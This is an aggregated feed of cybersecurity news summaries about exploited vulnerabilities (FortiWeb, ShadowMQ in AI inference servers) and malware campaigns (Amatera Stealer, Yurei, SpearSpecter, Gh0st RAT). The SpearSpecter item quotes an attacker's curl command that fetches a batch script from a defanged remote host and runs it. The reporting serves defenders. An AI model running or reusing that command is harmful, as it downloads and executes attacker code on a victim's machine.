• CISA has issued an urgent alert about a critical vulnerability in Fortinet’s FortiWeb Web Application Firewall (WAF), actively exploited by threat actors to seize administrative control of affected systems.

    Tracked as CVE-2025-64446, the flaw stems from a relative path traversal issue (CWE-23) that enables unauthenticated attackers to execute arbitrary administrative commands through specially crafted HTTP or HTTPS requests.

    Added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on November 14, 2025, the vulnerability carries a due date of November 21 for federal agencies to apply mitigations or discontinue use.

    Fortinet’s advisory (FG-IR-25-910) confirms the issue affects multiple FortiWeb versions, including those running firmware up to 7.4.7 and 7.6.5. Attackers can exploit it without authentication, potentially leading to complete system compromise, data exfiltration, or deployment of malware.

    While it’s unknown whether the vulnerability has been tied to ransomware campaigns, security researchers have reported real-world exploitation in the wild targeting organizations in sectors like finance and healthcare.

    FortiWeb WAF Vulnerability Exploited in the Wild

    “This path traversal bug is a classic but dangerous oversight in file handling,” said cybersecurity expert Maria Chen, a vulnerability researcher at a leading threat intelligence firm. “Unauthenticated access to admin functions turns a WAF meant to protect web apps into a backdoor for attackers.”

    Fortinet urges immediate patching to the latest versions, such as 7.4.8 or 7.6.6, and recommends restricting administrative access via network segmentation.

    For cloud-deployed instances, CISA advises adherence to Binding Operational Directive (BOD) 22-01, which mandates timely remediation of vulnerabilities in federal systems.

    Organizations unable to patch should isolate affected devices and monitor for indicators of compromise, such as unusual HTTP traffic patterns or unauthorized command execution.

    The flaw highlights ongoing risks in network security appliances, which are prime targets for advanced persistent threats (APTs). As exploitation ramps up, experts warn that unpatched FortiWeb deployments could amplify broader attack chains, such as lateral movement in enterprise networks. Fortinet has not disclosed the initial discovery method but emphasizes that no customer data was breached during its investigation.

    With the patch deadline looming, affected users are racing to update. Delays could expose sensitive infrastructure to persistent threats, underscoring the need for proactive vulnerability management in an era of zero-day exploits.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post CISA Warns of Fortinet FortiWeb WAF Vulnerability Exploited in the Wild to Gain Admin Access appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The Cybersecurity and Infrastructure Security Agency (CISA) has issued a critical security alert regarding multiple vulnerabilities affecting General Industrial Controls’ Lynx+ Gateway device. Released on November 13, 2025, under alert code ICSA-25-317-08, these flaws pose significant risks to industrial control systems. They could enable remote attackers to access sensitive information or disrupt critical operations. CVE […]

    The post CISA Alerts on Critical Lynx+ Gateway Flaw Leaks Data in Cleartext appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • This week showed just how fast things can go wrong when no one’s watching. Some attacks were silent and sneaky. Others used tools we trust every day — like AI, VPNs, or app stores — to cause damage without setting off alarms. It’s not just about hacking anymore. Criminals are building systems to make money, spy, or spread malware like it’s a business. And in some cases, they’re using the same

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • In November 2025, a new malware campaign emerged that combines social engineering tricks with advanced stealing tools.

    The attack starts when criminals trick users into running commands through the Windows Run window, a technique known as ClickFix.

    Once users follow these instructions, their computers become infected with Amatera Stealer, an advanced piece of malware designed to steal sensitive information from browsers, wallets, and password managers.

    Shortly after the initial infection, the attackers deploy NetSupport RAT, giving them full remote access to the victim’s computer.

    eSentire security analysts identified the malware after the second paragraph, noting that this campaign represents a significant evolution in how attackers combine multiple tools for maximum damage.

    The attack chain works through carefully crafted social engineering. Attackers convince users to open the Run prompt and execute specific commands.

    These commands trigger a series of hidden stages that eventually deliver Amatera Stealer to the victim’s machine. What makes this particularly dangerous is how the malware hides its true purpose.

    It uses obfuscated PowerShell code that has been deliberately made difficult to read and understand. The malware employs a special trick involving XOR encryption with the string “AMSI_RESULT_NOT_DETECTED” to decrypt the next stage while confusing security researchers.

    Attack chain leading to Amatera and NetSupport RAT (Source – eSentire)

    One of the most concerning aspects of this campaign involves the advanced evasion techniques used by Amatera Stealer. This malware was originally called ACR Stealer and was sold as a criminal service by a group called SheldIO.

    Now rebranded as Amatera, the stealer uses WoW64 SysCalls to bypass common security tools like antivirus software and endpoint detection systems. This means even machines with strong security tools installed remain vulnerable.

    The Infection Mechanism and Detection Evasion

    The infection begins with a .NET-based downloader that retrieves and decrypts payloads using RC2 encryption from services like MediaFire.

    This downloader is packed with Agile.net to make analysis harder for security teams. Once executed, it deploys a Pure Crypter-packed file that uses sophisticated process injection techniques.

    The malware then disables AMSI (Anti-Malware Scan Interface) by overwriting the “AmsiScanBuffer” string in the system’s memory, effectively turning off Windows’ built-in security scanning for the rest of the attack.

    Amatera communicates with its command servers using encrypted connections that bypass traditional security monitoring. It uses Windows APIs combined with WoW64 syscalls to encrypt all communications with AES-256-CBC, making traffic inspection nearly impossible.

    The malware collects stolen data into zip files and sends them to criminal servers using these encrypted channels. Through its loader functionality, it can execute additional payloads selectively on valuable targets, such as computers containing cryptocurrency wallets or machines connected to business networks.

    This selective approach helps attackers avoid wasting time on low-value targets and focus on organizations with real financial assets. The sophisticated nature of this campaign highlights why modern security requires multiple layers of protection.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post EVALUSION Campaign Using ClickFix Technique to deploy Amatera Stealer and NetSupport RAT appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A newly identified ransomware group, Yurei, has emerged as a significant threat to organizations worldwide, with confirmed attacks targeting entities in Sri Lanka and Nigeria across multiple critical industries. First publicly identified in early September 2025, Yurei operates a traditional ransomware-as-extortion model, infiltrating corporate networks, encrypting sensitive data, destroying backup systems, and leveraging a dedicated […]

    The post Yurei Ransomware: Encryption Mechanics, Operational Model, and Data Exfiltration Methods appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • As artificial intelligence infrastructure rapidly expands, critical security flaws threaten the backbone of enterprise AI deployments.

    Security researchers at Oligo Security have uncovered a series of dangerous Remote Code Execution (RCE) vulnerabilities affecting major AI frameworks from Meta, NVIDIA, Microsoft, and PyTorch projects, including vLLM and SGLang.

    The vulnerabilities, collectively termed “ShadowMQ,” stem from the unsafe implementation of ZeroMQ (ZMQ) communications combined with Python’s pickle deserialization.

    What makes this threat particularly alarming is how it spread across the AI ecosystem through code reuse and copy-paste development practices.

    How the Vulnerability Spread Across Frameworks

    The investigation began in 2024 when researchers analyzed Meta’s Llama Stack and discovered the dangerous use of ZMQ’s recv_pyobj() method, which deserializes data using Python’s pickle module.

    ShadowMQ Vulnerability CVE Data Table

    CVE IDProductSeverityCVSS ScoreVulnerability Type
    CVE-2024-50050Meta Llama StackCritical9.8Remote Code Execution
    CVE-2025-30165vLLMCritical9.8Remote Code Execution
    CVE-2025-23254NVIDIA TensorRT-LLMCritical9.3Remote Code Execution
    CVE-2025-60455Modular Max ServerCritical9.8Remote Code Execution
    N/A (Unpatched)Microsoft Sarathi-ServeCritical9.8Remote Code Execution
    N/A (Incomplete Fix)SGLangCritical9.8Remote Code Execution

    This configuration created unauthenticated network sockets that could execute arbitrary code during deserialization, enabling remote attackers to compromise systems.

    After Meta patched the vulnerability (CVE-2024-50050), Oligo researchers found identical security flaws across multiple frameworks.

    NVIDIA’s TensorRT-LLM, PyTorch projects vLLM and SGLang, and Modular’s Max Server all contained nearly identical vulnerable patterns.

    Oligo Code analysis revealed that entire files were copied between projects, spreading the security flaw like a virus. These AI inference servers power critical enterprise infrastructure, processing sensitive data across GPU clusters.

    Organizations trusting SGLang include xAI, AMD, NVIDIA, Intel, LinkedIn, Oracle Cloud, Google Cloud, Microsoft Azure, AWS, MIT, Stanford, UC Berkeley, and numerous other major technology companies.

    Successful exploitation could allow attackers to execute arbitrary code, escalate privileges, exfiltrate model data, or install cryptocurrency miners.

    Oligo researchers identified thousands of exposed ZMQ sockets communicating unencrypted over the public internet. However, Microsoft’s Sarathi-Serve and SGLang remain vulnerable with incomplete fixes.

    Organizations should immediately update to patched versions, avoid using pickle with untrusted data, implement authentication for ZMQ communications, and restrict network access to ZMQ endpoints.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post Critical RCE Vulnerabilities in AI Inference Engines Exposes Meta, Nvidia and Microsoft Frameworks appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A dangerous espionage campaign is targeting senior government and defense officials worldwide. Iranian hackers are using fake conference invitations and meeting requests to trick victims.

    The attackers spend weeks building trust before striking. They reach out through WhatsApp to make their messages look legitimate.

    This campaign, known as SpearSpecter, combines patience with powerful malware to steal sensitive information.

    The attackers work for Iran’s Islamic Revolutionary Guard Corps Intelligence Organization. They operate under several names including APT42, Mint Sandstorm, Educated Manticore, and CharmingCypress.

    Their main goal is stealing sensitive information from people with access to government secrets. What makes this group dangerous is how they adapt their methods and use both credential theft and long-term spying tools.

    Israel National Digital Agency security researchers identified the malware and uncovered the operation scope. The campaign has been running for months with no signs of stopping.

    The attackers target both officials and family members to increase pressure and find new entry points.

    Advanced Infection Through WebDAV and PowerShell

    The infection starts when victims receive a link claiming to be an important document for a meeting. When clicked, the link redirects to a file on OneDrive.

    Attackers abuse the Windows search-ms protocol to trigger a popup asking users to open Windows Explorer. If victims accept, their computer connects to the attacker’s WebDAV server.

    The WebDAV server displays what looks like a PDF file, but it’s actually a malicious shortcut. When opened, this shortcut runs hidden commands that download a batch script from Cloudflare Workers using the following command:-

    cmd / c curl --ssl-no-revoke -o vgh.txt hxxps://line.completely.workers.dev/aoh5 & rename vgh.txt temp.bat & %tmp%
    Initial access LNK file shared via WebDAV pretending to be a PDF file (Source – Govextra)

    The script loads TAMECAT, a sophisticated PowerShell-based backdoor that operates entirely in memory. TAMECAT uses AES-256 encryption to communicate with command servers through multiple channels including web traffic, Telegram, and Discord.

    TAMECAT collects browser passwords by launching Microsoft Edge with remote debugging and suspending Chrome processes. It captures screenshots every fifteen seconds and searches for documents. All stolen data gets split into five megabyte chunks and uploaded.

    TAMECAT’s In-Memory Loader Chain (Source – Govextra)

    To survive restarts, TAMECAT creates registry entries that run batch files at login. The malware avoids detection by using trusted Windows programs. Researchers found attackers using Cloudflare Workers for command infrastructure.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Iranian SpearSpecter Attacking High-Value Officials Using Personalized Social Engineering Tactics appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Phishing attacks are no longer confined to the email inbox, with 1 in 3 phishing attacks now taking place over non-email channels like social media, search engines, and messaging apps. LinkedIn in particular has become a hotbed for phishing attacks, and for good reason. Attackers are running sophisticated spear-phishing attacks against company executives, with recent campaigns seen targeting

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A newly released open-source tool called SilentButDeadly is raising security concerns by demonstrating how attackers can effectively turn off Endpoint Detection and Response systems and antivirus software without terminating any processes. Developed by security researcher Ryan Framiñán and released on November 2, 2025, the tool exploits the Windows Filtering Platform to sever cloud connectivity for […]

    The post SilentButDeadly: New Tool Blocks Network Traffic to Bypass EDR and Antivirus appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The threat actor known as Dragon Breath has been observed making use of a multi-stage loader codenamed RONINGLOADER to deliver a modified variant of a remote access trojan called Gh0st RAT. The campaign, which is primarily aimed at Chinese-speaking users, employs trojanized NSIS installers masquerading as legitimate like Google Chrome and Microsoft Teams, according to Elastic Security Labs. “The

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶